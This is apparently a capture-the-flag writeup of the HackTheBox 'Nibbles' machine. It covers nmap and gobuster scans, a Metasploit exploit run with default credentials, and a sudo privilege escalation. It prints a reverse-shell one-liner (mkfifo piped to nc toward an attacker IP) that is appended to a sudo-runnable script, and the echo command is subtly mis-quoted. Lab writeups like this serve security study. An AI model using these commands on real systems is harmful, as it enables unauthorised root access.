Post

Nibbles

Posted
Preview Image
By ChrisPham
views 2 min read

Writeup

After scanning, we know how many ports are opened, hostname and operating system is running on.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

nmap -sC -sV 10.129.47.166

Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-27 22:32 EST
Nmap scan report for 10.129.47.166
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

View the web’s content to see what we have here

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

curl 10.129.47.166                                           
<b>Hello world!</b>














<!-- /nibbleblog/ directory. Nothing interesting here! -->

We see that it gives us a directory to a blog, let visit it. We see it is powered by Nibbleblog. Now we need to brute force directory using gobuster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

gobuster dir -u http://10.129.47.166/nibbleblog -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -q

/.hta.xml             (Status: 403) [Size: 307]
/.htaccess            (Status: 403) [Size: 308]
/.htpasswd            (Status: 403) [Size: 308]
/.htaccess.xml        (Status: 403) [Size: 312]
/.hta                 (Status: 403) [Size: 303]
/.htpasswd.xml        (Status: 403) [Size: 312]
/README               (Status: 200) [Size: 4628]
/admin                (Status: 200) [Size: 2129]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 200) [Size: 1355]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 200) [Size: 3169]
/plugins              (Status: 200) [Size: 3779]
/themes               (Status: 200) [Size: 1743]

We have README, it’s a helpfull file! We can get the version of the CMS and use metaploit to exploit it. Set admin:nibbles as credential, tun0 as LHOST, target IP as RHOST then run

After getting shell, we use sudo -l to see what script that nibbler can run as root on Nibbles.

Now add payload to listen on our machine.

1

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | 	nc 10.10.14.192 1111 >/tmp/f | tee -a monitor.sh'

Now setup netcat on our machine to catch the shell.

1

nc -nvlp 1111

Change to target shell, execute the file.

1

sudo ./monitor.sh

On our machine will show

1
2
3
4

listening on [any] 1111 ...
connect to [10.10.14.192] from (UNKNOWN) [10.129.47.166] 40582
# whoami
root
HTB-machine, linux, easy
HTB CTF writeup nmap hfs msf